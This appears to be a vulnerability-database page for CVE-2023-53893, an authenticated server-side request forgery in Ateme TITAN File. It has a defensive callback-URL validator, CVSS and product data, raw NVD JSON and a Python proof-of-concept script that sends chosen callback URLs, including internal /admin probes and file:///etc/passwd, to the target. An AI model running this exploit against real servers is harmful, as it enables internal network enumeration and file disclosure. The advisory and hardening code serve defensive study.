Security Vulnerability Report
CVE-2023-53893 CVSS 6.5 MEDIUM

CVE-2023-53893

Published: 2025-12-15 21:15:53
Last Modified: 2025-12-18 21:36:17

Description

Ateme TITAN File 3.9.12.4 contains an authenticated server-side request forgery vulnerability in the job callback URL parameter that allows attackers to bypass network restrictions. Attackers can exploit the unvalidated parameter to initiate file, service, and network enumeration by forcing the application to make HTTP, DNS, or file requests to arbitrary destinations.
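The description above names the root cause: a callback URL that the application fetches without validating its scheme or destination. The following is an added example, not code from Ateme TITAN File or from the referenced advisories; the function names, the allowed-port policy and the constructed DNS table are assumptions. It places that unvalidated pattern beside a hardened check that allowlists http/https, rejects userinfo and unexpected ports, and resolves every hostname so that a destination answering with a loopback, link-local, private or IPv4-mapped address is refused before any request is made.

```python
"""SSRF guard for a user-supplied callback URL (added example; names assumed)."""
import ipaddress
import socket
from typing import Callable, Iterable, List, NamedTuple
from urllib.parse import urlsplit

Resolver = Callable[[str], Iterable[str]]


class CallbackRejected(ValueError):
    """Raised when a callback URL fails the hardened check."""


class SafeCallback(NamedTuple):
    url: str
    addresses: List[str]  # connect to one of these, not to the name (DNS rebinding)


def system_resolver(host: str) -> List[str]:
    """OS resolver: every A/AAAA answer for host (not used by the offline demo)."""
    try:
        infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return []
    return sorted({info[4][0] for info in infos})


def vulnerable_fetch_target(url: str) -> str:
    """The pattern the advisory describes: the client-supplied URL is the
    destination as-is, so file:///etc/passwd or http://169.254.169.254/ go through."""
    return url


def is_public_address(text: str) -> bool:
    """True only for globally routable unicast addresses."""
    ip = ipaddress.ip_address(text)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # judge ::ffff:127.0.0.1 as 127.0.0.1
    return ip.is_global and not ip.is_multicast


def validate_callback_url(url: str, resolve: Resolver = system_resolver,
                          allowed_ports=(80, 443)) -> SafeCallback:
    """Hardened check: scheme allowlist, no userinfo, port allowlist, public-only destination."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        raise CallbackRejected(f"scheme not allowed: {parts.scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise CallbackRejected("userinfo in URL is not allowed")
    host = parts.hostname
    if not host:
        raise CallbackRejected("missing host")
    try:
        port = parts.port
    except ValueError as exc:
        raise CallbackRejected("malformed port") from exc
    if port is None:
        port = 443 if parts.scheme == "https" else 80
    if port not in allowed_ports:
        raise CallbackRejected(f"port not allowed: {port}")
    # IP literals are judged directly; names are resolved and EVERY answer must be
    # public, so a name with one internal record among public ones is refused.
    try:
        ipaddress.ip_address(host)
        addresses = [host]
    except ValueError:
        addresses = list(resolve(host))
    if not addresses:
        raise CallbackRejected(f"host does not resolve: {host!r}")
    for addr in addresses:
        if not is_public_address(addr):
            raise CallbackRejected(f"{host!r} resolves to non-public address {addr}")
    return SafeCallback(url=url, addresses=addresses)


# Constructed DNS table so the demo runs offline and deterministically.
FAKE_DNS = {
    "cdn.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1", "::1"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example.com": ["93.184.216.34", "10.0.0.5"],  # one public, one internal answer
    "127.1": ["127.0.0.1"],  # libc expands this shorthand; a string match would miss it
}


def fake_resolver(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])


def check(url: str) -> str:
    """Return 'allowed' or 'rejected: <reason>' using the constructed DNS table."""
    try:
        validate_callback_url(url, resolve=fake_resolver)
        return "allowed"
    except CallbackRejected as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for candidate in ("https://cdn.example.com/hook", "file:///etc/passwd",
                      "http://metadata.internal/latest/", "http://[::ffff:127.0.0.1]/",
                      "http://127.1/admin", "http://rebind.example.com/",
                      "http://cdn.example.com:8080/", "http://user@cdn.example.com/"):
        print(f"{candidate:45} {check(candidate)}")
```

Validation at submission time does not cover HTTP redirects the fetching client later follows, nor a name whose answer changes between check and connect; disable redirects (or re-run the check on every hop) and connect to one of the returned addresses instead of re-resolving the name.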

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Weakness
CWE-918 (Server-Side Request Forgery)

Note: the CVSS 3.1 Primary vector above records PR:N (no privileges required), whereas the description calls the SSRF authenticated and the secondary CVSS 4.0 metric in the raw data below rates it PR:L with a base score of 5.3. When prioritising, treat the issue as requiring a valid TITAN File account; the higher 6.5 score reflects the v3.1 assessment only.

Configurations (Affected Products)

cpe:2.3:a:ateme:titan_file:3.9.8.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ateme:titan_file:3.9.9.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ateme:titan_file:3.9.11.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ateme:titan_file:3.9.12.4:*:*:*:*:*:*:* - VULNERABLE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import argparse

import requests
import urllib3

# The PoC disables TLS verification for lab targets; silence the resulting warning.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def exploit_ssrf(target_url, callback_url, session_cookie=None):
    """
    CVE-2023-53893 PoC - Ateme TITAN File SSRF
    Authenticated SSRF via job callback URL parameter.

    The endpoint path and parameter names below are those given in this page's
    PoC; they are not confirmed by the referenced advisories and may need
    adjusting for a given deployment.
    """
    # Target endpoint for job callback configuration
    endpoint = f"{target_url}/api/jobs/callback"

    # Malicious callback URL to trigger SSRF
    payload = {
        "callback_url": callback_url,
        "job_id": "test_job",
    }

    # The vulnerability is authenticated: supply a valid session cookie when the
    # target requires one (cookie-based session assumed; adjust to the deployment).
    headers = {"Cookie": session_cookie} if session_cookie else {}

    try:
        response = requests.post(endpoint, json=payload, headers=headers,
                                 verify=False, timeout=10)
        print(f"[*] Request sent to {endpoint}")
        print(f"[*] Callback URL: {callback_url}")
        print(f"[*] Response Status: {response.status_code}")
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return None


def ssrf_internal_probe(target_url, internal_host, session_cookie=None):
    """Probe an internal host via SSRF (HTTP request to its /admin path)."""
    callback_url = f"http://{internal_host}:80/admin"
    return exploit_ssrf(target_url, callback_url, session_cookie)


def ssrf_file_access(target_url, session_cookie=None):
    """Attempt local file access via SSRF using the file:// scheme."""
    callback_url = "file:///etc/passwd"
    return exploit_ssrf(target_url, callback_url, session_cookie)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="CVE-2023-53893 SSRF Exploit")
    parser.add_argument("--target", required=True, help="Target TITAN File URL")
    parser.add_argument("--callback", required=True, help="Callback URL to probe")
    parser.add_argument("--cookie", help="Session cookie for the authenticated endpoint")
    args = parser.parse_args()
    exploit_ssrf(args.target, args.callback, args.cookie)
```

References

https://www.ateme.com/product-titan-software/ (Product)
https://www.exploit-db.com/exploits/51582 (Exploit, Third Party Advisory)
https://www.vulncheck.com/advisories/ateme-titan-file-authenticated-server-side-request-forgery-vulnerability (Third Party Advisory)
https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php (Third Party Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2023-53893",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-15T21:15:52.683",
    "lastModified": "2025-12-18T21:36:17.203",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Ateme TITAN File 3.9.12.4 contains an authenticated server-side request forgery vulnerability in the job callback URL parameter that allows attackers to bypass network restrictions. Attackers can exploit the unvalidated parameter to initiate file, service, and network enumeration by forcing the application to make HTTP, DNS, or file requests to arbitrary destinations."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "NONE",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ateme:titan_file:3.9.8.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "6E4B3875-7745-42FE-925A-7D866410CB1E"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ateme:titan_file:3.9.9.2:*:*:*:*:*:*:*",
                "matchCriteriaId": "E2DF94E7-D06E-424E-8804-935CA80EE9C3"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ateme:titan_file:3.9.11.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "93FCDBD7-B26D-4FB8-90B3-3CE462B0CD69"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:ateme:titan_file:3.9.12.4:*:*:*:*:*:*:*",
                "matchCriteriaId": "B12949D5-B928-4C32-8B06-BE4AD5633BFE"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.ateme.com/product-titan-software/",
        "source": "[email protected]",
        "tags": ["Product"]
      },
      {
        "url": "https://www.exploit-db.com/exploits/51582",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://www.vulncheck.com/advisories/ateme-titan-file-authenticated-server-side-request-forgery-vulnerability",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5781.php",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}
```